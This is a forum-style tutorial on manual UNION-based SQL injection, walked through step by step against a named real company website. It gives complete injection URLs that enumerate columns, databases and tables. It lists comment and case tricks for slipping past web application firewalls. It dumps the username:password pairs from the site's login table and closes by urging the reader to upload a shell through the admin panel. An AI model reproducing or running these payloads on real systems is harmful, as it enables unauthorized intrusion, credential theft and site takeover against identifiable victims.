Union Select

NOW, we know we have 20 columns, now its time to select all the columns using union select
select statement is use to view data , if you want to learn more about sql, you can check my
article on working with SQL..

we use statement like this

http://www.cementcorporation.co.in/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

now you will see any DIGIT of columns on page
like 1 5 7 or anyone
if you don't see, place - before parameter value
example

http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

you can see in below picture

you can see 3 and 4 on the web page .. these two are string columns..
we can retrieve our data in these columns

sometimes union select dont work due to WAF (web app firewall) ,, we add comments in our queries like
/*!union*/+/*!select*/

/*!union*/+(/*!select*/

un/**/ion+sel/**/ect+1,2,3—

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—

or change case

/*!UnIOn*//*!SeLect*/+1,2,3—


etc



[Image: oksohyM.png]


now its time to retrieve data in these columns

we can retrieve sensitive data .. we can call functions for database name database(), version info version() or @@version, user info user(),
concat, group_concat(), LOAD_FILE etc and many more

oka for the tutorial, i will call version function in column 3 and db and user info in
column 4 using group_concat()...

for that i will use



http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,1 ​6,17,18,19,20--

I used 0x3a beacause its a hex value of SEMICOLON ( ; ) AND it will seprate two different values of different parameters

now u can see in the image the column 3 and 4 are now replace with values that I called

[Image: mYXScSV.png]

okay .. next thing

how to find all databases in the website ??

okay thats easy

now we need to replace column name with
query like this

http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--


see

[Image: lgt73e3.png]

now we know there are basicaly two databases,
information_schema and cementco_cement
ignore information_schema
why? because information_schema are system tables which define
databases.. we can use these tables to look at the database layout style


okay now we have our database ( we dont need to check, we can use its value actually, if we are trying to dump in current database,,, we can use
its function too.. database() instead of cementco_cement.. its needed when we are dumping in outside of current database
but in this case we will be simple dumping)

okay let now lets find the tables in current db

we will use WHERE , condtion in this query now

we will fetch tables with select statement and use where condtion to determine which database tables we want to fetch

okay
syntax


http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--

[Image: lgt97a9.png]

now you can see we have all table names Smile
which are

archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint, ​ tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animat ​ ion,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,t ​bl_tnc,tender,tender2,tender3,tender_drawing,unit

now we gonna dump in sensitive table
which is login

okay... lets dump it

now we will replace group_concat(table_name) with group_concat(column_name) and information_schema.tables with information_schema.columns
and in where condtion we will change table_schema with table_name
and will give parameter of table_name = name of table in qoute like
table_name='login'
why used qoute? because its datatype is varchar ..
sometimes it does not work
so we have to covert it into mysql char ... for that i use hack bar Big Grin

so now our query looks like

mysql char value of login is CHAR(108, 111, 103, 105, 110)

for exmaple

:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--

yeahhhh..now we can see columns of table 'login'
which are ...id,username,password,email,date_added,lastlogin,sessionid,type,status

[Image: 2uxh8Qh.png]

okayy...now the fun begins... time to dump the columns...
for example if we need to dump username and password columns from table 'login' we will replace the query with

select group_concat(username,0x3a,password) from login--
dumped

syntax

http://www.cementcorporation.co.in/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,​19,20 from login--
[Image: sE3M29s.png]

you can see username:password in the webpage Big Grin

now just find admin panel and upload the shell Big Grin

it was easy?? yeah.. but sometime waf can fuff your mind Big Grin 
If You Want Any Kind Help, Reply Here

Stay Updated With Facebook
Please Click Like Button

▼

Receive Free Updates (EMail):

Powered By FOCSoft